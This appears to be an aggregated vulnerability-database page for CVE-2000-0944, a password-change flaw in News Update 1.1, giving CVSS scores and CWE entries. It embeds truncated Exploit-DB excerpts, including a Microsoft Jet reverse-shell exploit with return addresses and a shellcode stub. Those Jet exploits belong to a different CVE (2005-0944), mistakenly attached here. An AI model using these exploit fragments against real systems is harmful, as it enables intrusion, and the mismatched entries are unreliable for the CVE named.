CVE-2000-0944
Published 2000-12-19
CVE-2000-0944: CGI Script Center News Update 1.1 does not properly validate the original news administration password during a password change operation, which allows remote…
Priority: P339, critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 11.27% (95.4th percentile)
CGI Script Center News Update 1.1 does not properly validate the original news administration password during a password change operation, which allows remote attackers to modify the password without knowing the original password.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cgi | script_center_news_update | — | — |
CVSS provenance
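| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |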
No detection rules found.
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
exploitdb·2005-04-22
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
---
```python
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# #
# #
# Based on the exploit written by S.Pearson and #
# Python version by coded by Tal zeltzer #
# #
# XP/sp2 fixed version by Jean Luc #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2
# EIP = "\x47\xAD\x05\x30"; # Use this one for MSAccess 2003 (jmp edx)
EIP = "\xF7\x69\x05\x30"; # Use this one MSAccess 2002 (jmp edx)
# EIP = "\xFf\xf7\x07\x30"; # Use this one MSAccess 2000 (jmp edx)
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x3
```
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
exploitdb·2005-04-11
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
---
```c
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
```
Exploit-DB
News Update 1.1 - Change Admin Password
exploitdb·2000-11-15
CVE-2000-0944 News Update 1.1 - Change Admin Password
---
```c
/***************************************************************************
news_exp.c - description
begin : Sat Oct 21 2000
copyright : (C) 2000 by Morpheus[bd]
email : [email protected]
advisory : www.brightdarkness.de
Exploit code for the News Update 1.1 by Morpheus[bd]
For more information see my advisory which should be in this .tar.gz
package.
Compiling/Linking: gcc exploit.c -o exploit
Usage: will be printed when the exploit is started without arguments
***************************************************************************/
/***************************************************************************
[Disclaimer]
Standard disclaimer applies here. Do not use this program. This program
is only for educational purposes. Use it on
```
No writeups or analysis indexed.
CWE
Unverified Password Change
mitre_cwe·CVSS 9.8
[CRITICAL] CWE-620 Unverified Password Change
CWE-620: Unverified Password Change
When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.
This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Access Control. Impact: Bypass Protection Mechanism, Gain Privileges or Assume Identity.
Potential Mitigations:
[Architecture and Design] When prompting for a password change, force the user to provide the original password in addition to the new password.
[Architecture and Desig
CWE
Insufficiently Protected Credentials
mitre_cwe
CWE-522 Insufficiently Protected Credentials
CWE-522: Insufficiently Protected Credentials
The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
Modes of Introduction:
Phase: Architecture and Design
Note: COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic.
Phase: Implementation
Common Consequences:
Scope: Access Control. Impact: Gain Privileges or Assume Identity. An attacker could gain access to user accounts and access sensitive data used by the user accounts.
Detection Methods:
Automated Static Analysis: Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/com
References:
http://archives.neohapsis.com/archives/bugtraq/2000-10/0402.html
http://www.securityfocus.com/bid/1881
https://exchange.xforce.ibmcloud.com/vulnerabilities/5433
Published: 2000-12-19